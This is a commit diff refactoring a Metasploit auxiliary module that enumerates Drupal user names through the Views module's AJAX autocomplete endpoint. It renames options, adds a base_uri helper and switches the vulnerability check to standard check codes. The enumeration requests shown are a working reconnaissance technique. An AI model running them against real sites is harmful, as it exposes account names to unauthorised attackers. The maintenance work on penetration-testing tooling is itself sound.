commit
d51d2bf5a0
|
@ -35,11 +35,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptString.new('PATH', [true, "Drupal Path", "/"])
|
OptString.new('TARGETURI', [true, "Drupal Path", "/"])
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
def check(base_uri)
|
def base_uri
|
||||||
|
@base_uri ||= "#{normalize_uri(target_uri.path)}?q=admin/views/ajax/autocomplete/user/"
|
||||||
|
end
|
||||||
|
|
||||||
|
def check_host(ip)
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => base_uri,
|
'uri' => base_uri,
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
|
@ -47,31 +51,21 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
}, 25)
|
}, 25)
|
||||||
|
|
||||||
if not res
|
if not res
|
||||||
return false
|
return Exploit::CheckCode::Unknown
|
||||||
elsif res and res.body =~ /\<title\>Access denied/
|
elsif res and res.body =~ /\<title\>Access denied/
|
||||||
# This probably means the Views Module actually isn't installed
|
# This probably means the Views Module actually isn't installed
|
||||||
print_error("#{rhost} - Access denied")
|
vprint_error("#{rhost} - Access denied")
|
||||||
return false
|
return Exploit::CheckCode::Safe
|
||||||
elsif res and res.message != 'OK' or res.body != '[ ]'
|
elsif res and res.message != 'OK' or res.body != '[ ]'
|
||||||
return false
|
return Exploit::CheckCode::Safe
|
||||||
else
|
else
|
||||||
return true
|
return Exploit::CheckCode::Appears
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def run_host(ip)
|
def run_host(ip)
|
||||||
# Make sure the URIPATH begins with '/'
|
|
||||||
datastore['PATH'] = normalize_uri(datastore['PATH'])
|
|
||||||
|
|
||||||
# Make sure the URIPATH ends with /
|
|
||||||
if datastore['PATH'][-1,1] != '/'
|
|
||||||
datastore['PATH'] = datastore['PATH'] + '/'
|
|
||||||
end
|
|
||||||
|
|
||||||
enum_uri = datastore['PATH'] + "?q=admin/views/ajax/autocomplete/user/"
|
|
||||||
|
|
||||||
# Check if remote host is available or appears vulnerable
|
# Check if remote host is available or appears vulnerable
|
||||||
if not check(enum_uri)
|
unless check_host(ip) == Exploit::CheckCode::Appears
|
||||||
print_error("#{ip} does not appear to be vulnerable, will not continue")
|
print_error("#{ip} does not appear to be vulnerable, will not continue")
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
@ -83,7 +77,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
vprint_status("Iterating on letter: #{l}")
|
vprint_status("Iterating on letter: #{l}")
|
||||||
|
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => enum_uri+l,
|
'uri' => base_uri+l,
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
'headers' => { 'Connection' => 'Close' }
|
'headers' => { 'Connection' => 'Close' }
|
||||||
}, 25)
|
}, 25)
|
||||||
|
|
Loading…
Reference in New Issue